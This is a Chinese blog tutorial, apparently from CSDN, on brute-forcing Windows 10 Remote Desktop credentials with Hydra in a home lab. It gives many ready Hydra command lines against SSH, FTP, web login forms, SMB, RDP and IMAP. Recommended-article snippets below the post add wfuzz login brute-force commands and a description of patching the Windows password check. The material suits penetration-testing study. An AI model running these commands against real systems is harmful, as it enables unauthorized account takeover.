hydra暴力破解win10用户名和密码

最新推荐文章于 2025-11-16 08:29:42 发布
原创 最新推荐文章于 2025-11-16 08:29:42 发布 · 1.7w 阅读 · 70 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #网络

本文详细介绍如何使用Hydra工具进行Windows 10的暴力破解,涉及开启3389端口、关闭防火墙、nmap扫描、以及Hydra命令参数和实战案例,确保了安全性和渗透测试的步骤。

hydra暴力破解win10用户名和密码

准备工作:win10计算机开启3389端口和关闭防火墙

  1. 开启3389端口

3389端口:Windows 10远程桌面的服务端口,可以通过这个端口,用"远程桌面"等连接工具来连接到远程的服务器。

在桌面上右击“我的电脑”,选择“属性”,点击左边“远程设置”,选择“允许连接到此计算机”。
在这里插入图片描述

  1. 此外,为了让扫描更加顺利,我们还需要关闭win10计算机的防火墙。当然我们也可以借助nmap来穿透防火墙进行扫描,这一点以后会演示给大家。
    “win+R”并输入命令:“cmd”打开win10计算机的终端,并输入命令"firewall.cpl"来打开防火墙的设置。
    在显示的页面中,在左侧选择“开启或关闭windows Defender 防火墙”,最后将“专用网络”与“公用网络”的防火墙,均关闭。
    在这里插入图片描述
    另外,我们还需要保证kali虚拟机与win10系统的网络是互通的。
    例如:
    kali的ip地址:192.168.1.130,win10的ip地址为192.168.1.138。
    这样,在kali的终端输入:ping 192.168.1.138,在win10终端输入:ping 192.168.1.130,就可以看到kali与win10之间的网络是互通的。
    在这里插入图片描述
    在这里插入图片描述

windows计算机中查看ip地址的命令:ipconfig。
kali虚拟机中查看ip地址的命令:ifconfig。
并且,ping命令在windows计算机中发送3次,会自动停止。而kali虚拟机中,则会一直向被测试的win10计算机发送测试数据。我们要想终止,就事用命令:ctrl+C。
在实际操作中,我发现:kali虚拟机要想ping通 win10计算机,必须先将win10的防火墙关闭。

  1. 使用namp 批量扫描 ,哪些开启3389端口。

在kali虚拟机中的终端输入命令:nmap -p 3389 192.168.1.10-255 。
在这里插入图片描述

hydra(九头蛇)

hydra是著名黑客组织thc的一款开源的暴力密码破解工具,可以在线破解多种密码。
官 网:http://www.thc.org/thc-hydra。

  1. 参数说明
 
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns] 
 
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT] 
 
-R 继续从上一次进度接着破解。 
 
-S 采用SSL链接。 
 
-s PORT 可通过这个参数指定非默认端口。 
 
-l LOGIN 指定破解的用户,对特定用户破解。 
 
-L FILE 指定用户名字典。 
 
-p PASS 小写,指定密码破解,少用,一般是采用密码字典。 
 
-P FILE 大写,指定密码字典。 
 
-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。 
 
-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。 
 
-M FILE 指定目标列表文件一行一条。 
 
-o FILE 指定结果输出文件。 
 
-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。 
 
-t TASKS 同时运行的线程数,默认为16-w TIME 设置最大超时的时间,单位秒,默认是30s。 
 
-v / -V 显示详细过程。 
 
server 目标ip 
 
service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt 
http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc 
ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec 
rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere 
teamspeak sip vmauthd firebird ncp afp等等。 
 
OPT 可选项
  1. 攻击案例
1、破解ssh: 
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh 
hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh 
 
2、破解ftp: 
hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV 
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV 
 
3、get方式提交,破解web登录: 
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/ 
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php
 
4、post方式提交,破解web登录: 
hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password" 
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>" 
(参数说明:-t同时线程数3-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,<title>中 的内容是表示错误猜解的返回信息提示。) 

5、破解https: 
hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https 
 
6、破解teamspeak: 
hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak 
 
7、破解cisco: 
hydra -P pass.txt 10.36.16.18 cisco 
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable 
 
8、破解smb: 
hydra -l administrator -P pass.txt 10.36.16.18 smb 
  
9、破解pop3: 
hydra -l muts -P pass.txt my.pop3.mail pop3 
 
10、破解rdp: 
hydra ip rdp -l administrator -P pass.txt -V 
 
11、破解http-proxy: 
hydra -l admin -P pass.txt http-proxy://10.36.16.18 
 
12、破解imap: 
hydra -L user.txt -p secret 10.36.16.18 imap PLAIN 
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
  1. 详细案例

RDP 是 Remote Display Protocal(远程显示协议)的缩写,是微软公司基于多用户 Windows 系统开发的远程连接协议。
在这里插入图片描述

  1. 详细案例

hydra暴力破解win10用户名和密码

B站演示连接:https://www.bilibili.com/video/BV1bh411y7i5

  1. 为了大家的计算机网络安全,一定要打开防火墙和win10自带的安全软件Defender。
【渗透测试】密码暴力破解工具——九头蛇(hydra)使用详解及实战
请大家直接把问题写在评论区或留言,不要只说一句"你好 或 在吗",我会尽快回复的。
05-05 8万+
【渗透测试】密码暴力破解工具——九头蛇(hydra)使用详解及实战
从RDP爆破定位内部攻击者
03-22 5055
一台没有发布任何服务到公网的服务器,却有大量的账户登录失败记录,咋一看实在有点让人费解。我们需要做的就是,从繁杂的现象中,拔丝抽茧找到有价值的信息,进一步定位攻击来源,从根源上解决攻击问题...
使用hydra离线破解windows密码
北城的博客
11-07 6116
kali中自带hydra,本文介绍如何使用kali自带的hydra破解windows的登陆密码 1.关闭windows的防火墙 控制面版—>系统安全—>Windows防火墙—>打开或关闭windows防火墙 关闭防火墙: 2. 更改远程设置,选择“允许......” 3.使用ifconfig查看kali的ip 4.使用ipconfig查看windows的ip 5.检查网络互通性 (1)windows ping kali (2)kali ping w.
如何使用Hydra进行暴力破解?
最新发布
2501_93842368的博客
11-16 744
Hydra 是一款强大的开源多协议暴力破解工具,支持 SSH、FTP、SMB、RDP、HTTP 等多种服务,通过字典攻击尝试获取登录凭证。以下是使用 Hydra 进行暴力破解的详细流程,包括核心命令、参数解析、实战案例及注意事项:暴力破解的核心逻辑是:通过用户名字典(包含可能的用户名密码字典(包含可能的密码),自动化尝试登录目标服务,直到匹配到正确的凭证。Hydra 支持多线程并发,可显著提高破解效率。安装 Hydra:Kali Linux 默认预装 Hydra,若未安装,执行:bash运行
【Kali】中密码暴力破解工具hydra的使用
xueshenlaila的博客
03-10 1万+
前言 hydra是著名黑客组织thc的一款开源的暴力破解密码工具,功能非常强大,kali下是默认安装的,几乎支持所有协议的在线破解。密码能否破解,在于字典是否强大。本文仅从安全角度去讲解工具的使用,请勿用于非法用途。 hydra参数讲解 -R #继续从上一次进度接着破解。 -S #采用SSL链接。 -s #PORT 可通过这个参数指定非默认端口。 -l #LOGIN 指定破解的用户,对特定用户破解。 -L #FILE 指定用户名字典。 -p #PASS 小写,指定密码破解,少用,一般是采用密
Win10开机密码破解软件 windows密码修改工具
04-28
一款电脑开机密码的破解软件,但它不能看到之前的密码是多少,但可以在不知道以前密码的情况下修改为新的密码,从而可以进系统。 它可以禁用开机密码,从而使之前的密码无效,也可以从新启用密码。 一般我们要在winpe下使用本软件,不然无法破解密码,所以一般把它拷贝到启动U盘里启动winpe下去使用它。 注意:如果你的电脑是UEFI的且你要直接dos启动本工具,你需要在bios里把启动模式改成Legacy / BIOS兼容模式,但winpe下不需要修改。 支持winxp,win7win8与win10系统,内含32位64位两个版,要按你的系统版本使用。 技术细节 : 该脚本尝试查找所有现有的Windows安装相应的Windows版本。 此后,更改权限后,将以“良性”字节序列替换负责密码验证的CMP指令。 为了恢复更改,过程恰恰相反。 整个想法源于WindowsGateAstr0baby的教程 用法: 打开软件后选择操作系统驱动器并使用按钮,备份,恢复,修补或取消打包。
WIN10密码破解
linzeyu的博客
08-16 1万+
WIN10密码破解汇总 在无法进入系统时 利用WINPE 制作一个WINPE(利用其他可用电脑) 开机进入winPE(F2 F8 F10 DEL ESC) 选择的Windows登入密码破解 选择“搜索所有SAM文件存在的分区“ 从0开始输入序号依次清除 进入PE系统 选择清除系统密码/ NTPWEdit密码工具点击打开 选中需要清除密码的账户 点击解锁或者修改密码 保存修改 ...
使用kali+hydra爆破win7用户密码
自知.的博客
03-19 3853
使用hydra暴力破解windows7的密码,适合网安小白学习。
Hydra暴力破解smb协议(Windows用户名密码
村口王大爷的博客
05-26 9453
首先什么是hydra Hydra对应的英文意思是九头蛇,它是一款爆破神器,可以对多种服务的账号密码进行爆破,包括Web登录、数据库、SSH、FTP等服务,支持LinuxWindows、Mac平台安装,其中Kali Linux中自带Hydra暴力破解攻击:暴力破解攻击是指攻击者通过系统的组合所有可能性(例如登录时用的账户名.密码),说白了就是穷举法,尝试所有的可能性破解用户的账户名.密码等敏感信息,攻击者会经常使用自动化脚本组合出正确的用户名密码。 SMB:全称是Server Message Bl
crunch生成密码字典,hydra暴力破解正常win10用户,hping3进行dos攻击代码抓包演示及命令详解
h1008685的博客
04-02 1919
crunch生成密码字典,hydra暴力破解工具详解,实战对win10用户3384端口rdp服务进行暴力破解并进行远程连接,hping3工具dos攻击代码抓包演示及命令详解
kali利用hydra破解Windows2003Server的用户密码
路~可以走过
06-09 4078
1.Windows2003先设置密码,以管理员运行cmd,输入命令 C:\Users\Administrator>net user administrator * 请键入用户的密码: 请再键入一次密码以便确认: 命令成功完成。 2. Kali使用john创建密码字典 john --wordlist --rules --stdout > m.txt --wordlis...
hydra windows版
06-26
hydra渗透人员必备工具,基于协议爆破密码,能够爆破21,22,3389,1433,1521等并且附带使用说明。
hydra-windows版
11-21
THC-HYDRA是一个支持多种网络服务的非常快速的网络登陆破解工具。这个工具是一个验证性质的工具,它被设计的主要目的是为研究人员安全从业人员展示远程获取一个系统的认证权限是比较容易的! 可能有的朋友要找windows版本的,没错,今天分享的就是windows版,然而跟linux下操作无区别啊,windows下也是还得在cmd界面下操作,而且速度貌似不如linux下。
hydra-windows版本
10-10
windows版本的hydra,支持rdp,ssh等Kali Linux里的hydra里的所有功能
支持windows的hydra
01-18
支持windows的hydra支持windows的hydra支持windows的hydra支持windows的hydra支持windows的hydra支持windows的hydra支持windows的hydra支持windows的hydra支持windows的hydra支持windows的hydra支持windows的hydra支持windows的hydra支持windows的hydra支持windows的hydra支持windows的hydra支持windows的hydra支持windows的hydra支持windows的hydra支持windows的hydra支持windows的hydra支持windows的hydra支持windows的hydra支持windows的hydra
burpsuite_1.7.36用户名密码暴力破解工具
10-30
burpsuite用户 用户名密码暴力破解,软件测试与post get请求分析
Linux密码破解(使用hydra工具使用john暴力破解
热门推荐
weixin_46447549的博客
11-13 2万+
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录一、使用hydra离线破解linux密码1.准备实验环境2.创建用户名字典3.hydra密码爆破二、复制shadow文件,使用john暴力破解1.实验环境1.复制linux的shadow文件2.john暴力破解 一、使用hydra离线破解linux密码 1.准备实验环境 ①攻击机:kali_linux 2021.2(ifconfig查询IP地址:192.168.119.132) ②靶机:Ubantu 16.04(ifconfig
FTP暴力破解-Hydra
王晓虎是萌新小白帽
07-17 1万+
王小虎是萌新小白帽第三步 先从第一个扫出来的21端口入手 首先hydra这个不是一个图形界面的软件,需要在命令行界面执行。但是连我这种英语小白都能用,大家就放心食用吧。 在hydra文件夹下按住shift点击鼠标右键,选择终端打开(win10是在此处打开powershell)。 ctrl+r 输入cmd 然后进到这个目录也是一样的。 解压即可无需安装。 在网上看有人说直接打hydra 就能用...
利用wfuzz爆破后台用户名密码
04-13
<think>嗯,用户想用wfuzz进行后台用户名密码的爆破测试,需要示例教程。首先,我得确认wfuzz的基本用法。wfuzz是一个web应用模糊测试工具,常用于目录参数爆破。用户可能对它的具体命令不太熟悉,需要给出具体的命令示例。 接下来,用户需要爆破用户名密码,这通常涉及到POST请求,表单参数。所以示例中应该包含POST方法、指定参数,并使用FUZZ关键字。可能需要使用-z参数指定字典文件,或者用多个-z处理不同的字段。 然后,要考虑是否需要处理会话,比如cookies或者session,有些登录页面可能需要先获取一个有效的会话ID。这时候可能需要结合其他工具,比如curl来获取cookie,再传递给wfuzz。例如,先用curl登录获取cookie,再用wfuzz带上该cookie进行爆破。 另外,过滤结果也很重要。用户可能需要根据响应的大小、行数或状态码来过滤无效的尝试。比如,使用--filter "code != 200"来排除错误响应,或者根据响应长度不同找到成功的组合。 用户还可能关心如何同时爆破用户名密码,这时候需要用到多个模糊点,比如USERPASS占位符,并使用-z file,users.txt-z file,passwords.txt来分别指定字典。同时,需要注意wfuzz的排列组合方式,可能需要使用所有可能的组合,这会增加测试次数,所以提醒用户控制测试规模。 还有,用户可能不知道如何查看结果,需要指出如何解释wfuzz的输出,比如HTTP状态码、响应长度等,以及如何识别成功的登录尝试。例如,成功的登录可能返回302重定向,而失败则是200,或者响应长度不同。 最后,要提醒用户法律问题,未经授权的测试是非法的,确保他们在合法范围内使用。同时,建议他们结合其他安全措施,如验证码或登录限制,来增强防护,引用之前的Hydra例子,说明限制尝试次数的重要性。 总结步骤:安装wfuzz,基本命令结构,处理POST请求,多个参数爆破,会话处理,结果过滤,示例命令,注意事项。这样用户能一步步跟着操作,同时了解相关风险优化方法。</think>### WFuzz 爆破后台用户名密码教程 #### 1. 基本命令结构 WFuzz 通过模糊测试参数爆破用户名密码,基本语法为: ```bash wfuzz -z <字典类型>,<字典路径> -d "参数名=FUZZ" -u <目标URL> [过滤条件] ``` - `-z`:指定字典来源(如文件、列表等) - `-d`:POST 请求参数 - `-u`:目标登录接口地址 #### 2. 单参数爆破示例 **爆破用户名(已知密码)**: ```bash wfuzz -z file,users.txt -d "username=FUZZ&password=test123" -u http://example.com/login ``` **爆破密码(已知用户名)**: ```bash wfuzz -z file,passwords.txt -d "username=admin&password=FUZZ" -u http://example.com/login ``` #### 3. 双参数同时爆破 使用两个 `-z` 参数分别定义用户名密码占位符: ```bash wfuzz -z file,users.txt -z file,passwords.txt -d "username=FUZZ&password=FUZ2Z" -u http://example.com/login ``` #### 4. 结果过滤 通过响应特征过滤无效结果: ```bash wfuzz --filter "code != 200" -z file,passwords.txt -d "username=admin&password=FUZZ" -u http://example.com/login ``` #### 5. 会话保持(Cookie/Session) 若需维持会话状态,先获取 Cookie 再注入: ```bash # 获取初始 Cookie curl -I http://example.com/login # 注入 Cookie 爆破 wfuzz -z file,passwords.txt -H "Cookie: PHPSESSID=abc123" -d "username=admin&password=FUZZ" -u http://example.com/login ``` #### 6. 完整示例(带过滤条件) ```bash wfuzz -z file,users.txt -z file,passwords.txt \ -d "username=FUZZ&password=FUZ2Z" \ -u http://example.com/login \ --filter "h=200 and chars>1000" ``` - `h=200`:过滤 HTTP 200 状态码 - `chars>1000`:筛选响应长度超过 1000 字符的结果 #### 注意事项 1. **合法性**:仅对授权目标测试,避免触犯法律[^1] 2. **字典质量**:使用常见弱口令字典(如 `rockyou.txt`) 3. **速率控制**:添加 `-t 10` 限制并发线程数 4. **协议适配**:HTTPS 需添加 `-k` 参数绕过证书验证
评论 5
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值